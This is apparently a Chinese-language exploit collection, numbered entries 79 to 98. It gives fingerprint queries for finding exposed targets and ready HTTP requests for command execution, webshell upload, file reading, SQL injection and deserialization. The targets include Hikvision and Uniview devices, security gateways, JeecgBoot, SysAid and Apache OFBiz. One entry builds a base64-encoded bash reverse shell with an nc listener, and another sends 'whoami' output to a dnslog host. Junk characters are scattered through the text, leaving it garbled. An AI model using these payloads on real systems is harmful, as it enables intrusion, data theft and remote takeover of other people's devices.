------YsOxWxSvj1KyZow1PTsh98fdu6l--6 ]$ Z; p0 ~' G
8 J0 X5 M) G& u4 @ |( j+ ^/ d
/ W3 z. @1 |5 u5 f" S) r& s! \* f
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1* m2 x, V! t5 s. E6 d; r
Host: x.x.x.x5 ^4 O) S( T. a7 G( A9 W; P# Y; s0 z
$ C9 s5 O9 f# c3 u) z
# t1 O+ V: }1 B2 |) ^- \79. BYTEVALUE 百为流控路由器远程命令执行' _4 K4 c0 {5 y4 f- l1 ` g
FOFA:BYTEVALUE 智能流控路由器' @9 P& B( a- ?
GET /goform/webRead/open/?path=|id HTTP/1.12 P0 O1 b6 z/ Z. O8 Z2 p N
Host:IP
8 Q t+ i2 I8 T. c+ D. @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
. x0 c- X% t) B4 NAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 `+ o, ] g) `* b% D- ?$ aAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. V$ C0 o; L: i
Accept-Encoding: gzip, deflate/ e( @# N9 @+ q+ P/ Q
Connection: close
" A# A3 {' ?0 a& _; p4 yUpgrade-Insecure-Requests: 19 L1 k% j, A% I. G
% y( G4 t8 ^3 t% s, }
" Z8 m4 L: v2 I$ V80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
9 e# T. [6 V) n: K/ d7 i2 [FOFA:app="速达软件-公司产品"6 r ]$ P. D8 k' u
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1! w p0 ]4 u+ w# i3 F- W# l
Host: x.x.x.x
0 P q5 I& t8 I. g# q. F# u" CUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
9 q% u' q8 f8 ~4 H" @Content-Length: 27
/ n2 [! Z+ z" t& |9 jAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
% L( t% n! _5 @$ j/ P, ~Accept-Encoding: gzip, deflate
. T% Y& [+ l: MAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 o& q+ s; |' E7 ], H8 V
Connection: close
1 E4 {. Q( K/ @% y+ P% f) E- sContent-Type: application/octet-stream8 {' z9 i% l8 m. p2 m
Upgrade-Insecure-Requests: 17 Q6 n3 G: Q& J. ^7 U
! w7 Y! X4 }' ?, _' x4 W6 V<% out.print("oessqeonylzaf");%>
- u. |) ~$ ^$ t! n) l& p' V, B9 y ~% `2 o, E Q
; k3 L, J8 g+ r. pGET /xykqmfxpoas.jsp HTTP/1.1
& M w" j/ m ?: T0 s5 A- @% m6 NHost: x.x.x.x
- N' S2 D; P, l: Z) ~User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 i& f( q; n9 p/ p
Connection: close! j1 Z- f. C5 K& ~/ t8 r
Accept-Encoding: gzip, n& J. O4 j# Z0 A; B' c# g
$ e6 A+ o2 _- P
( Z: g& \8 J% w s* e81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
4 r& A6 g8 ~$ d$ F; M$ w4 lFOFA:app="uniview-视频监控"
7 A. \! g8 s# K6 XGET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1" s. e- N S& U/ K5 J
Host: x.x.x.x* k. j) s% a M1 J3 P
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
1 F. c. m. L& k% GConnection: close
3 b3 C8 r/ n5 T* g5 Z+ |7 }Accept-Encoding: gzip
: b3 N/ e5 Q$ h: z# }( i! q0 O7 \+ V3 c% b3 `$ U
% m$ p. n3 ^+ z2 i* W' Z82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
% `) u8 G+ i# H* ~7 DFOFA:app="思福迪-LOGBASE"1 Q% Z0 l$ e, R2 B- w6 V
POST /bhost/test_qrcode_b HTTP/1.1- w# b& Y( `# Q/ |/ x- n7 m
Host: BaseURL
/ ]. h4 [4 l/ F o( WUser-Agent: Go-http-client/1.1
( k/ n9 k* B" Z6 a6 wContent-Length: 23
9 P+ v3 v4 B- X# g/ {5 \4 JAccept-Encoding: gzip0 H0 b4 C% ~& K2 V
Connection: close/ o4 J3 p" J3 O; v$ Z7 o. I! t0 W
Content-Type: application/x-www-form-urlencoded w7 [9 M9 f3 i
Referer: BaseURL
; ?' E0 k- p6 \# |1 y% K$ }5 c4 [* J( {% A- e: j* c3 k
z1=1&z2="|id;"&z3=bhost" |1 O, t% s1 ?8 l' ^3 W
. k" O4 o& W0 C0 s( d$ n
0 S a0 g. B, ], L83. JeecgBoot testConnection 远程命令执行! R% }) L' G9 h( w9 N
FOFA:title=="JeecgBoot 企业级低代码平台"
3 v) Q. b. o/ h! t3 n2 P' K2 Q- j) V& Y4 {
+ P. I' O/ K' l }3 y1 jPOST /jmreport/testConnection HTTP/1.1! c7 W0 |' @) `; i& ]
Host: x.x.x.x, @( S* V$ }% A$ c# Z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
6 B, T8 z" s1 x) a, P0 P% EConnection: close3 `" S/ F8 D" y) W( h- K
Content-Length: 8881% v& o; t( @) a* M% f4 [
Accept-Encoding: gzip
/ S! _+ X" c) {, D5 L: y0 {( D/ ZCmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"$ `0 O" |+ T% `- B4 ?
Content-Type: application/json$ ]& |$ d4 l" v6 y! B
5 Y4 \7 |( k1 N! B( r. W8 |, nPAYLOAD
, d$ @4 E. k" W; ?! u% X, H+ Y, S+ Y
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
; X8 B! F8 p2 t1 qFOFA:title=="JeecgBoot 企业级低代码平台"
- h! t7 Z5 y7 i; K2 O
. g. E/ e6 ~8 T6 P6 P' i+ O- Z8 K) i: Q6 p5 ]* X ]" G- b
2 m% M- S& R' v, S" x' e7 N* RPOST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.17 P5 b; f4 J, T3 V
Host: 192.168.40.130:80802 C( r5 E- }, W* q& L1 R3 V/ P
User-Agent: curl/7.88.1" O5 u7 l3 K9 j9 ?# }0 ]
Content-Length: 156! m8 L5 e2 ?' q
Accept: */*' t, V9 s) ~+ c! M
Connection: close
- [4 G) s/ i" f4 H2 @1 c. R3 `Content-Type: application/json3 b6 u, \5 W% P% n6 n8 Y9 K
Accept-Encoding: gzip! ]2 y1 T3 k8 d$ t
0 ^" F7 a4 V7 z4 Z2 P& z{' U4 n# V; Z7 a/ r% b( p
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
$ y* q) }* k/ Y v" b+ U9 w "type": "0"
: @* w/ e& Q4 ?- O0 j4 J}' C" y# K, ~6 ]" T
( F! \" y2 h' h" Y% u3 Q6 }- W
: g! j$ P9 E) m/ g85. SysAid On-premise< 23.3.36远程代码执行
7 U' {' c& H* L* K1 B0 `CVE-2023-47246
& U3 J. P# m+ [; O4 j% i/ Y+ S" M- YFOFA:body="sysaid-logo-dark-green.png"
' ?' g# o7 Q0 HEXP数据包如下,注入哥斯拉马 Y) H q9 O% q" y- T1 m7 ^8 U
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1: c9 G5 j2 y4 A0 s7 L1 H# Y2 q
Host: x.x.x.x
4 g% k9 c* }# N) q. z) w+ UUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.156 O/ |! Q# F+ X, @* E* f h6 X
Content-Type: application/octet-stream& P* x- u% q3 ^6 D4 O
Accept-Encoding: gzip/ i: H1 _* j# p1 r
. K# e+ \; t" ?3 E( w/ ?PAYLOAD
' }- K+ Q# g7 x, v2 m0 D6 ^5 e
3 e. @3 K+ r1 t/ @, \( d回显URL:http://x.x.x.x/userfiles/index.jsp3 {3 {" Q% W2 o; F
. D3 f) j; p& ^5 L: `86. 日本tosei自助洗衣机RCE' P4 M( B+ M% D
FOFA:body="tosei_login_check.php"
( L. O& E3 v& }POST /cgi-bin/network_test.php HTTP/1.1
' ?" T* v" s$ M7 U+ Q0 P% CHost: x.x.x.x+ ~) A* f) d' r( q! k2 m) U9 R
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
: D% }8 U/ \( h' EConnection: close! ]6 r. X+ k; n
Content-Length: 44
: C1 I b$ P. N+ {! u% x$ H+ `Accept: */*
7 c7 v0 R p1 p) tAccept-Encoding: gzip
, o; m6 Y* m9 {# s! s, G- CAccept-Language: en
- Z4 g& b# C1 Y+ T+ DContent-Type: application/x-www-form-urlencoded
A: H, f7 e: j4 t, l7 E- V. M8 p- V, Z. [* p5 u, X* o0 i
host=%0acat${IFS}/etc/passwd%0a&command=ping
0 R) _2 h$ H& e2 ?! h7 v& W, E1 J7 m! k0 |+ ?
) N' T, Q l ?- x& Y, B
87. 安恒明御安全网关aaa_local_web_preview文件上传" n$ s( M9 J2 P u) G9 P
FOFA:title="明御安全网关"
( n; m, S$ c- d7 V5 ]& o- TPOST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.16 \2 O2 v7 _: p$ P
Host: X.X.X.X4 G/ t" J+ G) c, ?& U
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
# }$ x+ V7 S* rConnection: close
* W6 G6 C: l$ n& K! }! _- HContent-Length: 198/ T3 U5 }( M- X; `+ M) b2 j
Accept-Encoding: gzip- [9 B; b2 B1 t! |+ i& W
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
+ p6 h3 M7 n3 R3 i' x+ j4 g( ~" n9 z( E1 D
--qqobiandqgawlxodfiisporjwravxtvd0 |' c' d+ i3 K; u
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php" C' `+ ^! I1 o) l. F4 K
Content-Type: text/plain, [, h5 } I" J {8 K
* Y7 v* ~/ Q$ v6 ]
2ZqGNnsjzzU2GBBPyd8AIA7QlDq
5 ]$ |* @6 K, ?5 E--qqobiandqgawlxodfiisporjwravxtvd--
9 E1 E8 W9 |: g6 V8 s$ q) d; \+ \) _1 }8 A4 N
h0 I5 X9 [7 t
/jfhatuwe.php7 Q' X) ]/ G J, C6 k
2 j% c& v+ }3 F9 O& a- e88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行6 g1 ~3 q! H3 l4 T, r V7 ]
FOFA:title="明御安全网关"
/ B& _, @, ~% Y& c7 qGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
& Q4 D" Q$ j' _3 d4 gHost: x.x.x.xx.x.x.x: Y: i0 z$ b% r( \ d$ x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15% i' r) P9 N1 q0 q) H% K5 q/ e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
! Z+ _/ i0 C( OAccept-Encoding: gzip, deflate+ n4 s5 f5 k& U0 }9 r
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: \& h; C0 s" y& y/ T) z3 @Connection: close" t) B* R8 D0 `+ A
, |- _( S% V- f' a6 v$ a( Z3 a+ @# w3 o
/astdfkhl.php
8 ~9 f, Y% I& q9 \, u% d$ G
8 G/ K6 Q( V k. ]5 n9 E89. 致远互联FE协作办公平台editflow_manager存在sql注入
/ s+ J5 \4 a( v: |# l" e8 RFOFA:title="FE协作办公平台" || body="li_plugins_download" X* d- C, |' a
POST /sysform/003/editflow_manager.js%70 HTTP/1.1, ~: p) s1 }! I4 Y
Host: x.x.x.x( M: e- z7 G: a4 d) Y h" j, K* N6 c
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
" w; K3 p3 |: L. v8 F, x0 [& VConnection: close
% D6 {2 \6 x# A5 w7 ~: AContent-Length: 41
4 D) O; V6 R6 A( J) wContent-Type: application/x-www-form-urlencoded
. a% A" W; G V( b2 H9 uAccept-Encoding: gzip! q1 t7 ~0 h: H [: z
9 q6 E3 p/ B* Q# i5 j# `
option=2&GUID=-1'+union+select+111*222--+& c7 E# n+ R( \6 G
?" ]/ D7 Q1 E9 V3 ~
* p" A/ e+ V! h5 t90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
* `3 \- S6 [: J! y5 E5 QFOFA:icon_hash="-1830859634"
5 |6 A8 b* c N3 `/ |POST /php/ping.php HTTP/1.1
3 `+ Y: _) w, ?6 [ d y3 C+ W; sHost: x.x.x.x& l9 P& A0 C- K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0( i% f& `7 P8 l1 S' j& q5 U
Content-Length: 51) m' h6 p+ g- F9 R1 C$ A
Accept: application/json, text/javascript, */*; q=0.01: V: m1 F% ?8 V$ p+ _* \* l0 |$ h
Accept-Encoding: gzip, deflate$ F: s2 Z1 [% L/ | d; Z0 {5 W( l8 e
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; T! _: K. q9 M& q! ^* `Connection: close
1 n6 x6 m; \6 fContent-Type: application/x-www-form-urlencoded5 c9 m" O4 z) K( r/ ^$ x
X-Requested-With: XMLHttpRequest" ]4 N! M7 x: i& x
, F+ @( Q+ ^) j/ E8 q4 q5 t" ~" ?$ w
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig+ x6 Y" j& X% L% y3 m7 _+ I
E( m2 E8 l7 Y, [$ j z$ ]2 B: R( U* G
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取) u% K2 }! c; T& D
FOFA:title="综合安防管理平台"* C* o, w+ x u9 f
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
# F* q* G. f# i$ L& {Host: your-ip3 A/ W* ]( A( w! M' ]" S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.364 \7 i3 d2 I$ K* _+ Q
Accept-Encoding: gzip, deflate
" t1 e) J3 ?0 Q2 O& lAccept: */*
' \* b0 X3 Y: _# WConnection: keep-alive
7 y, a H5 i3 D& {* f8 @
0 k6 \* L2 W8 D0 j& Z3 [
1 O/ L+ ~' D3 A' Y, K
- ^* |2 \: y1 k8 }6 a/ ]92. 海康威视运行管理中心session命令执行
/ X I" ]- }& e" `Fastjson命令执行+ a) M1 W* l. H" `
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"; B, d; e+ @# [8 i& u
POST /center/api/session HTTP/1.1 \' n& {, u# e7 L
Host:
1 z+ e0 E0 `: W* r/ b' p; }/ D+ w5 |Accept: application/json, text/plain, */** L. Z9 D- x/ E* W1 E" u. |
Accept-Encoding: gzip, deflate
# C6 z: Y: L) SX-Requested-With: XMLHttpRequest6 x' ~' [+ ]% M% n: X
Content-Type: application/json;charset=UTF-8
' S! z, o1 h9 d: L& ]2 b( \# oX-Language-Type: zh_CN
# P( W u3 L u, xTestcmd: echo test
; R- R% Y( M2 z% L' `9 c! `User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
/ [# ~5 N$ F% X6 bAccept-Language: zh-CN,zh;q=0.9
" H6 x: F& b: U+ l# p |Content-Length: 5778
; H; [6 s4 h+ L9 S4 U6 H8 f" t( W0 G4 n$ o8 c, {
PAYLOAD5 y5 E- d; d2 `1 h& [" K' R g
" v' x* [4 V$ _, I+ r1 u* _! l9 s# v$ P# @$ X' i( Y, ~+ p
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
/ U. A7 T8 E; B' P/ YFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
7 K. Y' A h/ }: U' M" NPOST /?g=app_av_import_save HTTP/1.1! R+ Y6 i( A6 I
Host: x.x.x.x
4 g/ W8 X( f7 \8 o- g+ B* pContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
- O1 m# W4 e) C# k8 _; E$ z4 O% FUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
) I3 a6 I6 ?+ r: }* l; H
. G" \* a) j* P/ W( B* q' w3 H% F& U------WebKitFormBoundarykcbkgdfx2 A" U! y7 |/ w/ z9 R" ~2 {: C
Content-Disposition: form-data; name="MAX_FILE_SIZE"$ Q' O N" X* p, m* A. h. A I/ M
; |+ ?) G6 m; c4 L7 ~, G7 |6 l9 k
10000000
, s5 ^ ?6 T( _( [5 z- i------WebKitFormBoundarykcbkgdfx! V8 w( c: Y2 ~' `/ n$ Q
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt" L) } a& m& B0 r# b+ }
Content-Type: text/plain
. P+ \1 n3 L9 B5 X" l/ L! Y5 L5 W1 |: z+ O
wagletqrkwrddkthtulxsqrphulnknxa. p7 E! w v, d% }2 q( y
------WebKitFormBoundarykcbkgdfx
7 h3 G/ _& ?8 f( d1 Q* L% vContent-Disposition: form-data; name="submit_post"
9 B5 A: J; y& U% s, |) x( o f- b: [, w: ?7 V
obj_app_upfile" w E3 B7 z- W' x/ l; x/ s4 ]
------WebKitFormBoundarykcbkgdfx4 A! w/ P/ ]0 D& ^
Content-Disposition: form-data; name="__hash__"
/ [; z3 J; S6 t% L. [$ h9 m
5 V. h! O! F% ?$ L8 T2 S0b9d6b1ab7479ab69d9f71b05e0e9445% N; ?. J/ v( E& _" W8 C
------WebKitFormBoundarykcbkgdfx--
. C& ~5 C; C/ O+ \+ J& f9 B2 x. Z& s' E' W& ~
" y# B5 ~( e8 c/ A- ]) @) B7 U
GET /attachements/xlskxknxa.txt HTTP/1.1
, ~: w6 J+ O) e- pHost: xx.xx.xx.xx( C7 ] C- o! n) _4 N2 `& p" o
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36& B+ ~! I5 D& f3 R
4 U i' [2 T: g
" W7 K+ O- u& V) `! ?% ^0 k
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传, q4 U8 Q; R: V, ^, c. J0 r% F
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="( O0 c+ }; S! V5 S }* m
POST /?g=obj_area_import_save HTTP/1.1# d4 ?) T5 S, K |
Host: x.x.x.x7 R& a7 G6 H) C
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt0 K' H# _# s4 U6 m# E5 }1 x1 I8 t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
# e" R( {: p/ d, o% k
0 ]0 n* \" d$ C5 o3 h------WebKitFormBoundarybqvzqvmt5 i, P5 {3 ~8 [; M) x
Content-Disposition: form-data; name="MAX_FILE_SIZE". Z# g* k, R) g3 j
! b2 S Q; f1 o o& [9 M/ p100000008 r" p# a1 m/ a% Y- [
------WebKitFormBoundarybqvzqvmt
. m# q6 L, ?9 D1 l; j6 EContent-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
/ Z1 m1 F$ w# n3 HContent-Type: text/plain) F* r1 |6 }0 x1 Q" P
+ E1 {0 s. B9 c" t& i \0 b# \1 opxplitttsrjnyoafavcajwkvhxindhmu
0 m! L w& W* J( {! Q$ _+ g------WebKitFormBoundarybqvzqvmt' L' w' I( k2 h" N
Content-Disposition: form-data; name="submit_post"+ t% R4 g) E* g& k
0 l, }: V2 H f0 c! \ G
obj_app_upfile( h2 M* X! H$ H2 H
------WebKitFormBoundarybqvzqvmt
7 v* y8 x3 N. g. iContent-Disposition: form-data; name="__hash__"# _* S9 {, ^2 G# F( M" n
& j, l7 {7 }1 Y% r8 C% }% K" O0b9d6b1ab7479ab69d9f71b05e0e94455 A6 m' F/ D( y+ K3 [# c$ h
------WebKitFormBoundarybqvzqvmt--
7 D/ v! W6 O% ~ h+ R; s& [# `4 q
8 O3 g7 @& A, v6 y" ~8 j, M
; `# v1 R$ G2 x3 [8 N3 l4 O, `. q& w/ p' ^+ l+ u5 k) y
GET /attachements/xlskxknxa.txt HTTP/1.1
5 Q5 E( F2 q8 g& l6 m! pHost: xx.xx.xx.xx! E( |' C9 b9 c8 K4 `, K
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.368 P: \0 A" l! Q* k' {: g. a
4 n5 Q$ f }6 A& P q0 y! W5 v. X
! @8 `; Y% m- ~: ^6 K& n
5 k' k/ ~% s+ p" t4 I95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
) `' J5 A! H$ K! r" MCVE-2023-49070& Q6 s$ h; W" S! G$ i, h( X
FOFA:app="Apache_OFBiz"2 J, [7 g# p, X
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
, f- _3 n# {" e' q& h$ EHost: x.x.x.x
& V- ]4 [3 o0 u) k1 t7 [User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
$ _. L9 F8 w1 D" U4 LConnection: close
4 d. g8 Y7 @" M5 |9 R* fContent-Length: 889
- e3 ^" {1 b* o( {2 c; mContent-Type: application/xml
4 H4 C. F+ D! M) }Accept-Encoding: gzip
9 H/ ^9 h% `5 v0 t6 I# b) S
. H( C+ y2 Q. }9 h/ }<?xml version="1.0"?>
5 Q. h. @& S. b1 J1 y<methodCall>! G8 W0 {# |+ W" N7 P
<methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>) W7 n1 S8 {2 H$ g# r
<params>
3 a! k7 B+ X, l3 d6 |/ b$ z <param>) v8 I) C: p1 c, e
<value>
) A- u8 ?; H* `- }$ }+ m1 i <struct>
, ?, q$ c) d: K( K7 `! X' u5 a* O7 T <member>( A. ^8 }2 p. B( p
<name>test</name>7 Z! l/ t* _( h! D1 Z" p, k
<value>
& K$ T3 _2 }# c0 u <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>7 O' r% A! P; p3 B8 K
</value>
, n% X+ x n/ M! E+ d0 H% \ </member>
1 u& y- _$ d; G </struct>
. ]9 t$ F7 ?9 d3 K </value>. ?$ X* d0 y/ Z4 r# \& e* _
</param>
3 j- ?/ q- l s3 u5 W" I, P% u1 P </params># ]5 B3 d U9 E& U- H5 `
</methodCall>
& Y/ H3 U9 R9 s( X1 @+ c
M1 w3 c% A0 ?$ [% ^, L2 S# I% b& }6 t$ n
用ysoserial生成payload( U" G. T. X3 T9 K! s. B6 C
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"$ K6 m1 s# I( W7 I. \7 t0 S
7 _3 J' K0 \) n6 o- Y% w
+ z+ n$ n! a( R1 Q! o% T
将生成的payload替换到上面的POC
" v% c5 L6 J. B* a M; e6 `POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
- W! a4 i+ X: R- WHost: 192.168.40.130:8443
3 M- c, {; \& p7 V# c1 ^; @User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
) A% p: E1 X' J- OConnection: close* I. s; L9 w& H; z! i1 Q/ A" ~
Content-Length: 889
0 @: i; D0 V$ M. L2 ]5 b. N$ JContent-Type: application/xml
1 t& w1 {8 }) {3 W3 C" oAccept-Encoding: gzip
' r8 Z9 D. L! x& M- E' Z$ P2 o
" O/ d5 C6 }7 ]2 j4 c( I& zPAYLOAD: r2 S6 T# x4 K5 X! a& P) [' ?
+ r# [3 i" z1 O; k' d- C$ a96. Apache OFBiz 18.12.11 groovy 远程代码执行+ X" ]9 a- x- J' o6 m
FOFA:app="Apache_OFBiz"
0 e* `$ B" c5 g/ i8 F* n; pPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
, s; K' \4 l+ @ p/ IHost: localhost:8443 I+ f4 _& G9 @9 ^ p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.06 c* k1 @; f& C* m
Accept: */*
; y, J) ~. x& S/ x6 D4 oAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- \- ?# O7 F. B
Content-Type: application/x-www-form-urlencoded, q. w0 s) r6 d+ B
Content-Length: 553 z% { K t' a
& D* H$ B9 W% _( |
groovyProgram=throw+new+Exception('id'.execute().text);
( e' E8 L. ?* w: w: K
. u/ }, K. Z8 k: k2 _
0 c8 M) Q3 c) K/ O5 R反弹shell- {6 V" K) V) S9 _) E$ @
在kali上启动一个监听
8 k& H" o, i6 V G# W7 P3 g1 Tnc -lvp 77771 r% J. @( t {* V! Q
$ [. {; {$ a/ L! w* q7 k, a
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
! r- _1 L+ i1 C) w. Y* Q' u6 D1 DHost: 192.168.40.130:8443! \2 e; L! D# U9 W/ G& Z4 a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
+ O( t* X; Q+ j: m/ WAccept: */*: f2 z: m9 T& _1 t2 F) i; K* g
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% L% w" C1 d. M0 U) V( w' e2 TContent-Type: application/x-www-form-urlencoded. A; n8 R8 O+ o$ R/ B
Content-Length: 71% X b. {0 Y1 f+ k2 v2 x* p
- V0 Y6 g3 C* q. s; h
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
& G% M; s7 b% \/ a6 }; i/ B3 B0 J% K2 c
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
/ Q- A; X5 C0 y G# h0 i$ UFOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"- }; H( o5 \( y0 W+ d5 X
GET /passport/login/ HTTP/1.1
. U3 s, D7 i( o9 y- z) KHost: 192.168.40.130:8085 w7 h' M* g& w& |* ~! W
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.154 f# p* C' C8 e T p- S' n4 @
Accept-Encoding: gzip
; T% q% F9 O0 r% J; VConnection: close
- r- q$ r5 g R0 }1 a2 Y, NCookie: rememberMe=PAYLOAD
. t1 {. g' x0 Y z. ~6 V; `8 TX-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
) x! z( N9 O* Y0 v: T" H7 T. R: }* A* _, z5 Y" r- \
2 D! {# y) b9 K! [98. SpiderFlow爬虫平台远程命令执行9 G* R& y7 T I7 O% d% ?7 T! R
CVE-2024-0195
4 R: m2 z5 ?3 N: P& w2 hFOFA:app="SpiderFlow" m9 b' Z9 `, ~
POST /function/save HTTP/1.1
% [/ [( [; W# X% P# v2 CHost: 192.168.40.130:80880 t$ ~& m$ G, i- @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
* X3 r$ A- _; }, @+ o# Q3 v3 s- n3 fConnection: close
, b/ D! X: ^7 ~, uContent-Length: 121- E5 e' i' M! ?4 n1 M5 R Z' \" x
Accept: */*4 Q' v) S4 l0 O9 h
Accept-Encoding: gzip, deflate
5 T$ m0 \1 }! b9 ^Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
